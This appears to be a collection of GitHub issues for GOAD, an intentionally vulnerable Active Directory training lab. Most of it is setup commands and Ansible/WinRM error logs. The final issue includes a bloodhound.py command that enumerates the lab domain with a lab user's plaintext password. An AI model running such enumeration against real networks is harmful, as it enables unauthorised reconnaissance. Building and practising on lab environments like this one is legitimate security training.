orange-cyberdefense / goad
game of active directory
License: GNU General Public License v3.0
Description: Ubuntu 22.04 LTS
Release: 22.04
Codename: jammy
Vagrant: 2.2.19
Ansible: Core 2.12.6
Running Vagrant Up results in WinRM Error:
Edited: Included additional output
(.venv) test@AD-Lab:~/Desktop/GOAD$ vagrant up --provision
Bringing machine 'DC01' up with 'virtualbox' provider...
==> DC01: Importing base box 'StefanScherer/windows_2019'...
==> DC01: Matching MAC address for NAT networking...
==> DC01: Checking if box 'StefanScherer/windows_2019' version '2021.05.15' is up to date...
==> DC01: Setting the name of the VM: GOAD_DC01_1657733508313_12037
==> DC01: Clearing any previously set network interfaces...
==> DC01: Preparing network interfaces based on configuration...
DC01: Adapter 1: nat
DC01: Adapter 2: hostonly
==> DC01: Forwarding ports...
DC01: 3389 (guest) => 3389 (host) (adapter 1)
DC01: 5985 (guest) => 55985 (host) (adapter 1)
DC01: 5986 (guest) => 55986 (host) (adapter 1)
DC01: 22 (guest) => 2222 (host) (adapter 1)
==> DC01: Running 'pre-boot' VM customizations...
==> DC01: Booting VM...
==> DC01: Waiting for machine to boot. This may take a few minutes...
DC01: WinRM address: 127.0.0.1:55985
DC01: WinRM username: vagrant
DC01: WinRM execution_time_limit: PT2H
DC01: WinRM transport: plaintext
An error occurred executing a remote WinRM command.
Shell: Cmd
Command: hostname
Message: Digest initialization failed: initialization error
in the README.md
it says:
the lab take environ 60Go (but you have to get the space for the vms vagrant images windows server 2016 (6.15Go) / windows server 2019 (6.52) / ubuntu 18.04 (502M))
the total space needed for the lab is ~80-100 Go (and more if you take snapshots)
Could you explain what 60Go and ~80-100 Go are? What does Go mean? Do you mean GB as in gigabytes?
Edit: I see the language of the author is French, as shown by the following sentence later in the README.md: exchange sur kingslanding ou une autre machine ?
and the French translation of Gigabyte is GigaOctet (GO).
Perhaps you could update the README.md to be translated correctly? Otherwise I look forward to deploying and playing this game soon.
Windows 10 OS running Virtualbox 6.1
Running Vagrant up all appears to function as expected.
When we reach the part for the remote winrm section, it appears to timeout due to DC01 not booting fully.
It's difficult to demo of course over screen shot, but essentially the white spinning circle runs for a few revolutions then locks up.
I've attempted to boot this VM manually, without any network adapter, or with the internal adapter attached only, but to no avail.
Default windows firewall is enabled on the Win 10 device.
Hi guys, I'm having some issue with ad-relations.yml
Previously, I had some error with MSSQL installation, but was able to troubleshoot it. But now I'm facing a new issue while installing ad-relations.yml. Here's the following errors. I can't add
I don't understand, the servers are up and running but it seems I can add other users, even if I'm doing it manually with users and computers tools. I took some snapshots, I tried to launch the playbook countless times, but the error still persists
Here's the following error:
win_reboot: attempting post-reboot test command
EXEC (via pipeline wrapper)
win_reboot: attempting post-reboot test command
EXEC (via pipeline wrapper)
win_reboot: system successfully rebooted
changed: [192.168.56.11] => {
"changed": true,
"elapsed": 181,
"rebooted": true,
"unreachable": false
}
TASK [groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}}] *******************************************************************************
task path: /home/sparda/Documents/GIT/GOAD/ansible/roles/groups_domains/tasks/main.yml:5
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
<192.168.56.11> ESTABLISH WINRM CONNECTION FOR USER: vagrant on PORT 5986 TO 192.168.56.11
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
<192.168.56.12> ESTABLISH WINRM CONNECTION FOR USER: vagrant on PORT 5986 TO 192.168.56.12
EXEC (via pipeline wrapper)
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).Result was: {
"attempts": 1,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).Result was: {
"attempts": 1,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).Result was: {
"attempts": 2,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).Result was: {
"attempts": 2,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).Result was: {
"attempts": 3,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
The full traceback is:
Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.
At line:64 char:21
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ScriptStackTrace:
at , : line 64
Microsoft.ActiveDirectory.Management.ADServerDownException: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running. ---> System.ServiceModel.EndpointNotFoundException: No DNS entries exist for host north.sevenkingdoms.local.
Server stack trace:
at System.ServiceModel.Channels.DnsCache.Resolve(Uri uri)
at System.ServiceModel.Channels.SocketConnectionInitiator.GetIPAddresses(Uri uri)
at System.ServiceModel.Channels.SocketConnectionInitiator.Connect(Uri uri, TimeSpan timeout)
at System.ServiceModel.Channels.BufferedConnectionInitiator.Connect(Uri uri, TimeSpan timeout)
at System.ServiceModel.Channels.ConnectionPoolHelper.EstablishConnection(TimeSpan timeout)
at System.ServiceModel.Channels.ClientFramingDuplexSessionChannel.OnOpen(TimeSpan timeout)
at System.ServiceModel.Channels.CommunicationObject.Open(TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannel.OnOpen(TimeSpan timeout)
at System.ServiceModel.Channels.CommunicationObject.Open(TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannel.CallOpenOnce.System.ServiceModel.Channels.ServiceChannel.ICallOnce.Call(ServiceChannel channel, TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannel.CallOnceManager.CallOnce(TimeSpan timeout, CallOnceManager cascade)
at System.ServiceModel.Channels.ServiceChannel.EnsureOpened(TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannel.Call(String action, Boolean oneway, ProxyOperationRuntime operation, Object[] ins, Object[] outs, TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannelProxy.InvokeService(IMethodCallMessage methodCall, ProxyOperationRuntime operation)
at System.ServiceModel.Channels.ServiceChannelProxy.Invoke(IMessage message)
Exception rethrown at [0]:
at System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
at Microsoft.ActiveDirectory.WebServices.Proxy.Resource.Get(Message request)
at Microsoft.ActiveDirectory.Management.AdwsConnection.SearchAnObject(ADSearchRequest request)
--- End of inner exception stack trace ---
at Microsoft.ActiveDirectory.Management.AdwsConnection.InitializeForAutoReconnect[TChannel](Boolean& isAutoReconnecting, TChannel& channel, ChannelFactory`1& chFactory, String endpointName, CommunicationException& commException)
at Microsoft.ActiveDirectory.Management.AdwsConnection.SearchAnObject(ADSearchRequest request)
at Microsoft.ActiveDirectory.Management.AdwsConnection.Search(ADSearchRequest request)
at Microsoft.ActiveDirectory.Management.ADWebServiceStoreAccess.Microsoft.ActiveDirectory.Management.IADSyncOperations.Search(ADSessionHandle handle, ADSearchRequest request)
at Microsoft.ActiveDirectory.Management.ADObjectSearcher.GetRootDSE()
at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.GetRootDSE()
at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.GetConnectedStore()
at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.GetCmdletSessionInfo()
at Microsoft.ActiveDirectory.Management.Commands.ADGetCmdletBase`3.ADGetCmdletBaseBeginCSRoutine()
at Microsoft.ActiveDirectory.Management.CmdletSubroutinePipeline.Invoke()
at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'DragonsFriends', 'value': ['north.sevenkingdoms.local\jon.snow', 'sevenkingdoms.local\tyron.lannister', 'essos.local\daenerys.targaryen']}) => {
"ansible_loop_var": "item",
"attempts": 3,
"changed": false,
"item": {
"key": "DragonsFriends",
"value": [
"north.sevenkingdoms.local\jon.snow",
"sevenkingdoms.local\tyron.lannister",
"essos.local\daenerys.targaryen"
]
},
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running."
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).Result was: {
"attempts": 1,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
I'm running Ubuntu 22.04 with vagrant 2.2.18 as a workaround to resolve the issue described here: #12
This is the setup process I followed. Taken from the official setup process with added dependencies required for Ubuntu 22.04:
sudo apt update && sudo apt install curl docker.io ansible git virtualbox python3-pip python3.10-venv -y
(python3.8-venv not available on Ubuntu 22.04)
wget -O- https://apt.releases.hashicorp.com/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/hashicorp-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update && sudo apt install vagrant=2.2.18
git clone https://github.com/Orange-Cyberdefense/GOAD
cd GOAD/ansible
sudo pip3 install virtualenv
python3 -m pip install --upgrade pip
python3.10 -m virtualenv .venv
Start venv environment:
source .venv/bin/activate
python3 -m pip install --upgrade pip
python3 -m pip install ansible-core==2.12.6
python3 -m pip install pywinrm
ansible-galaxy install -r requirements.yml
In ~/GOAD folder path:
sudo docker build -t goadansible .
##GOAD_backup folder in GOAD_VM main folder is the VM snapshot setup to this point.##
vagrant up
cd ansible
ansible-playbook main.yml
I get the following errors when running ansible-playbook main.yml:
TASK [Gathering Facts] *************************************************************************************************************
fatal: [192.168.56.10]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.10', port=5986): Max retries exceeded with url: /wsman (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f7994eb4880>: Failed to establish a new connection: [Errno 113] No route to host'))", "unreachable": true}
TASK [member_server : Add member server] *******************************************************************************************
changed: [192.168.56.23]
fatal: [192.168.56.22]: FAILED! => {"changed": true, "msg": "failed to join domain: Computer 'castelblack' failed to join domain 'north.sevenkingdoms.local' from its current workgroup 'WORKGROUP' with following error message: The specified domain either does not exist or could not be contacted.", "reboot_required": false}
TASK [trusts : Add trusts between domain] ******************************************************************************************
fatal: [192.168.56.12]: FAILED! => {"changed": true, "debug": [], "error": [{"category_info": {"activity": "", "category": "NotSpecified", "category_id": 0, "reason": "MethodInvocationException", "target_name": "", "target_type": ""}, "error_details": null, "exception": {"help_link": null, "hresult": -2146233087, "inner_exception": {"help_link": null, "hresult": -2146233088, "inner_exception": null, "message": "The specified forest does not exist or cannot be contacted.", "source": "System.DirectoryServices", "type": "System.DirectoryServices.ActiveDirectory.ActiveDirectoryObjectNotFoundException"}, "message": "Exception calling "GetForest" with "1" argument(s): "The specified forest does not exist or cannot be contacted."", "source": "System.Management.Automation", "type": "System.Management.Automation.MethodInvocationException"}, "fully_qualified_error_id": "ActiveDirectoryObjectNotFoundException", "output": "Exception calling "GetForest" with "1" argument(s): "The specified forest does not exist or cannot be contacted."\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : ActiveDirectoryObjectNotFoundException\r\n \r\n", "pipeline_iteration_info": [0, 1], "script_stack_trace": "at , : line 19", "target_object": null}], "host_err": "", "host_out": "", "information": [], "output": [], "result": {}, "verbose": [], "warning": []}
TASK [password_policy : set password policy] ***************************************************************************************
fatal: [192.168.56.11]: FAILED! => {"changed": true, "debug": [], "error": [{"category_info": {"activity": "Set-ADDefaultDomainPasswordPolicy", "category": "ResourceUnavailable", "category_id": 21, "reason": "ADServerDownException", "target_name": "WORKGROUP", "target_type": "ADDefaultDomainPasswordPolicy"}, "error_details": null, "exception": {"help_link": null, "hresult": -2146233088, "inner_exception": {"help_link": null, "hresult": -2146233088, "inner_exception": null, "message": "Unable to find a default server with flags: 'Writable | ADWS | ReturnDnsName'.", "source": null, "type": "Microsoft.ActiveDirectory.Management.ADException"}, "message": "Unable to find a default server with Active Directory Web Services running.", "source": "Microsoft.ActiveDirectory.Management", "type": "Microsoft.ActiveDirectory.Management.ADServerDownException"}, "fully_qualified_error_id": "ActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.SetADDefaultDomainPasswordPolicy", "output": "Set-ADDefaultDomainPasswordPolicy : Unable to find a default server with Active Directory Web Services running.\r\nAt line:19 char:1\r\n+ Set-ADDefaultDomainPasswordPolicy -Identity $Domain -AuthType Negotia ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : ResoureUnavailable: (WORKGROUP:ADDefaultDomainPasswordPolicy) \r\n[Set-ADDefaultDomainPasswordPolicy], ADServerDownException\r\n + FullyQualifiedErrorId : \r\nActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.SetADDefaultDomainPasswordPolicy\r\n \r\n", "pipeline_iteration_info": [0, 1], "script_stack_trace": "at , : line 19", "target_object": {"AddedProperties": {"Comparer": {}, "Count": 0, "IsReadOnly": false}, "ComplexityEnabled": null, "LockoutDuration": null, "LockoutObservationWindow": null, "LockoutThreshold": null, "MaxPasswordAge": null, "MinPasswordAge": null, "MinPasswordLength": null, "ModifiedProperties": {"Comparer": {}, "Count": 0, 
"IsReadOnly": false}, "PasswordHistoryCount": null, "PropertyCount": 0, "PropertyNames": {"Count": 0, "IsReadOnly": true, "IsSynchronized": false, "SyncRoot": {}}, "RemovedProperties": {"Comparer": {}, "Count": 0, "IsReadOnly": false}, "ReversibleEncryptionEnabled": null}}], "host_err": "", "host_out": "", "information": [], "output": [], "result": {}, "verbose": [], "warning": []}
192.168.56.10 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.11 : ok=29 changed=16 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.12 : ok=30 changed=19 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
192.168.56.22 : ok=17 changed=10 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.23 : ok=41 changed=21 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
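A triage helper for output like the run above, as an added example that is not part of the original report or of the GOAD code base: it groups every fatal/failed line by host and by a coarse cause label, falling back to the raw text when a pasted JSON payload no longer parses. The label names, the helper names and the sample log (constructed, shortened from the messages quoted above) are assumptions of this example.

```python
import json
import re
from collections import defaultdict

# (substring, label) pairs checked in order; the labels are made up for this example.
RULES = [
    ("No route to host", "winrm-no-route"),
    ("timed out", "winrm-timeout"),
    ("No DNS entries exist", "dns-resolution"),
    ("Active Directory Web Services", "adws-unavailable"),
    ("does not exist or could not be contacted", "domain-unreachable"),
    ("does not exist or cannot be contacted", "domain-unreachable"),
]

TASK_RE = re.compile(r"^TASK \[(?P<task>.+)\] \*+")
# Matches both "fatal: [host]: STATUS! => {...}" and "failed: [host] (item=...) => {...}".
FAIL_RE = re.compile(
    r"^(?:fatal|failed): \[(?P<host>[^\]]+)\](?:: (?P<status>\w+)!)?.*? => (?P<payload>.*)$"
)

# Constructed sample: shortened versions of the messages in the report above.
SAMPLE = r'''
TASK [Gathering Facts] ****
fatal: [192.168.56.10]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.10', port=5986): Max retries exceeded with url: /wsman (Caused by NewConnectionError('Failed to establish a new connection: [Errno 113] No route to host'))", "unreachable": true}
TASK [member_server : Add member server] ****
changed: [192.168.56.23]
fatal: [192.168.56.22]: FAILED! => {"changed": true, "msg": "failed to join domain: The specified domain either does not exist or could not be contacted.", "reboot_required": false}
TASK [trusts : Add trusts between domain] ****
fatal: [192.168.56.12]: FAILED! => {"changed": true, "error": [{"exception": {"message": "Exception calling "GetForest" with "1" argument(s): "The specified forest does not exist or cannot be contacted.""}}]}
TASK [password_policy : set password policy] ****
fatal: [192.168.56.11]: FAILED! => {"changed": true, "error": [{"exception": {"inner_exception": {"message": "Unable to find a default server with flags: 'Writable | ADWS | ReturnDnsName'."}, "message": "Unable to find a default server with Active Directory Web Services running."}}]}
TASK [groups_domains : Add a domain user/group from another Domain] ****
failed: [192.168.56.11] (item={'key': 'AcrossTheSea'}) => {"attempts": 3, "changed": false, "msg": "Could not find domain user, group, service account or computer named daenerys.targaryen"}
'''


def _messages(node):
    """Yield every string stored under a 'msg' or 'message' key, at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key in ("msg", "message") and isinstance(value, str):
                yield value
            else:
                yield from _messages(value)
    elif isinstance(node, list):
        for item in node:
            yield from _messages(item)


def classify(detail):
    """Return the label of the first rule whose substring occurs in the text."""
    for needle, label in RULES:
        if needle in detail:
            return label
    return "other"


def parse_failures(text):
    """Return one record per fatal/failed line, tagged with the task it ran in."""
    task, found = None, []
    for line in text.splitlines():
        m = TASK_RE.match(line)
        if m:
            task = m.group("task")
            continue
        m = FAIL_RE.match(line)
        if not m:
            continue
        payload = m.group("payload")
        try:
            msgs = list(_messages(json.loads(payload))) or [payload]
        except json.JSONDecodeError:
            # Pasted output often has inner quotes left unescaped; use the raw text.
            msgs = [payload]
        detail = " | ".join(msgs)
        found.append({
            "host": m.group("host"),
            "task": task,
            "status": m.group("status") or "FAILED",
            "category": classify(detail),
            "detail": detail,
        })
    return found


def hosts_by_category(failures):
    """Map each cause label to the sorted list of hosts that reported it."""
    grouped = defaultdict(set)
    for failure in failures:
        grouped[failure["category"]].add(failure["host"])
    return {cat: sorted(hosts) for cat, hosts in grouped.items()}


if __name__ == "__main__":
    for cat, hosts in hosts_by_category(parse_failures(SAMPLE)).items():
        print(f"{cat:20} {', '.join(hosts)}")
```
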
I try to deploy the GOAD v2 on my labs to learn active directory.
I have followed religiously the steps for getting the requirements:
sudo apt install python3.8-venv
cd ansible
virtualenv .venv
source .venv/bin/activate
python3 -m pip install --upgrade pip
python3 -m pip install ansible-core==2.12.6
python3 -m pip install pywinrm
ansible-galaxy install -r requirements.yml
ansible-playbook main.yml
But here is my output :
PLAY [Read data files] ***********************************************************************************************************************************************************************************
TASK [Gathering Facts] ***********************************************************************************************************************************************************************************
ok: [192.168.56.12]
ok: [192.168.56.11]
ok: [192.168.56.10]
ok: [192.168.56.22]
TASK [save the Json data to a Variable as a Fact] ********************************************************************************************************************************************************
ok: [192.168.56.10]
ok: [192.168.56.11]
ok: [192.168.56.22]
ok: [192.168.56.12]
PLAY [Adjust rights configuration] ***********************************************************************************************************************************************************************
TASK [Gathering Facts] ***********************************************************************************************************************************************************************************
ok: [192.168.56.12]
ok: [192.168.56.22]
ok: [192.168.56.10]
ok: [192.168.56.11]
TASK [settings/adjust_rights : Add domain users to local groups] *****************************************************************************************************************************************
changed: [192.168.56.12] => (item={'key': 'Administrators', 'value': ['essos\\daenerys.targaryen']})
changed: [192.168.56.22] => (item={'key': 'Administrators', 'value': ['north\\jeor.mormont']})
changed: [192.168.56.10] => (item={'key': 'Administrators', 'value': ['sevenkingdoms\\robert.baratheon', 'sevenkingdoms\\cersei.lannister']})
changed: [192.168.56.11] => (item={'key': 'Administrators', 'value': ['north\\eddard.stark', 'north\\catelyn.stark', 'north\\robb.stark']})
changed: [192.168.56.12] => (item={'key': 'Remote Desktop Users', 'value': ['essos\\Targaryen']})
changed: [192.168.56.22] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Night Watch', 'north\\Mormont', 'north\\Stark']})
changed: [192.168.56.10] => (item={'key': 'Remote Desktop Users', 'value': ['sevenkingdoms\\Small Council']})
changed: [192.168.56.11] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Stark']})
PLAY [cross domain groups] *******************************************************************************************************************************************************************************
TASK [Gathering Facts] ***********************************************************************************************************************************************************************************
ok: [192.168.56.12]
ok: [192.168.56.10]
ok: [192.168.56.11]
TASK [groups_domains : Reboot and wait for the AD system to restart] *************************************************************************************************************************************
changed: [192.168.56.10]
changed: [192.168.56.12]
changed: [192.168.56.11]
TASK [groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}}] *********************************************************************
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'DragonsFriends', 'value': ['north.sevenkingdoms.local\\jon.snow', 'sevenkingdoms.local\\tyron.lannister', 'essos.local\\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "DragonsFriends", "value": ["north.sevenkingdoms.local\\jon.snow", "sevenkingdoms.local\\tyron.lannister", "essos.local\\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: Either the target name is incorrect or the server has rejected the client credentials."}
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
failed: [192.168.56.11] (item={'key': 'AcrossTheSea', 'value': ['essos.local\\daenerys.targaryen']}) => {"added": [], "ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "AcrossTheSea", "value": ["essos.local\\daenerys.targaryen"]}, "msg": "Could not find domain user, group, service account or computer named daenerys.targaryen", "removed": []}
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'Spys', 'value': ['sevenkingdoms.local\\Small Council']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "Spys", "value": ["sevenkingdoms.local\\Small Council"]}, "msg": "Unhandled exception while executing module: Authentication failed on the remote side (the stream might still be available for additional authentication attempts)."}
The problem was already discussed in issue #19, but since no information about the fix was given and reinstalling my venv + ansible didn't fix anything, I am opening another issue here because it must be a different problem.
I'm running Ubuntu 18.04 and the Vagrant part seems to be set up properly.
Tried to launch the playbook 6 or 7 times but no luck for me..
Tried both the playbook alone and the main.yml 6 or 7 times.
Any idea of what's wrong?
I have found the following comment in the playbook where the error occurs:
# doesn't work see : https://github.com/ansible-collections/community.windows/blob/main/plugins/modules/win_domain_group_membership.ps1
# line 62 : use the given credentials to distant domain -> wrong
What is the fix I should implement, if any?
Hi @Mayfly277, thank you for making this lab, it's awesome! So many ready options, vectors of attack, and customization :)
For me as a beginner pentester it would be really great to have the ability to discuss some techniques applied specifically to this lab, and I think it may be beneficial for many guys here :) Any chance you will create a Discord server/channel for this? I'm ready to do it as well, if that's okay
Hello,
Just wanted to know whether the project is still active and in development for the implementation of other vulnerabilities? It would be interesting to add a SQL+WEB server and a CIFS server, adding the delegation vulnerabilities with the web and SQL server, etc.
Thanks for everything, your blog and all your resources are really great!!
Provisioning the VMs with ansible fails immediately due to not being able to reach the network. Output below. Have tried to then statically set the IP addresses on the Windows VMs, however this also does not resolve the issue.
ansible-playbook main.yml
[WARNING]: Could not match supplied host pattern, ignoring: srv01
PLAY [build all] ******************************************************************************************************************************************************************************************
TASK [Gathering Facts] ************************************************************************************************************************************************************************************
^C [ERROR]: User interrupted execution
^C
ansible-playbook build.yml
[WARNING]: Could not match supplied host pattern, ignoring: srv01
PLAY [build all] ******************************************************************************************************************************************************************************************
TASK [Gathering Facts] ************************************************************************************************************************************************************************************
fatal: [192.168.56.10]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.10', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c490>, 'Connection to 192.168.56.10 timed out. (connect timeout=500)'))", "unreachable": true}
fatal: [192.168.56.22]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.22', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c580>, 'Connection to 192.168.56.22 timed out. (connect timeout=500)'))", "unreachable": true}
fatal: [192.168.56.11]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.11', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c580>, 'Connection to 192.168.56.11 timed out. (connect timeout=500)'))", "unreachable": true}
fatal: [192.168.56.12]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.12', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c580>, 'Connection to 192.168.56.12 timed out. (connect timeout=500)'))", "unreachable": true}
fatal: [192.168.56.23]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.23', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c580>, 'Connection to 192.168.56.23 timed out. (connect timeout=500)'))", "unreachable": true}
PLAY RECAP ************************************************************************************************************************************************************************************************
192.168.56.10 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.11 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.12 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.22 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.23 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
==> DC01: Clearing any previously set network interfaces...
==> DC01: Preparing network interfaces based on configuration...
DC01: Adapter 1: nat
DC01: Adapter 2: hostonly
==> DC01: Forwarding ports...
DC01: 3389 (guest) => 2204 (host) (adapter 1)
DC01: 5985 (guest) => 2205 (host) (adapter 1)
DC01: 5986 (guest) => 2206 (host) (adapter 1)
DC01: 22 (guest) => 2207 (host) (adapter 1)
==> DC01: Running 'pre-boot' VM customizations...
==> DC01: Booting VM...
==> DC01: Waiting for machine to boot. This may take a few minutes...
DC01: WinRM address: 127.0.0.1:2205
DC01: WinRM username: vagrant
DC01: WinRM execution_time_limit: PT2H
DC01: WinRM transport: negotiate
An error occurred executing a remote WinRM command.
Shell: Cmd
Command: hostname
Message: Digest initialization failed: initialization error
Hello !
I'm using my own host to launch the BloodHound ingestor on Linux (using Exegol as you do in your guide).
It works fine for the following command:
bloodhound.py --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local
However, for the next two commands I get a "Connection timed out", even though it finds the domain.
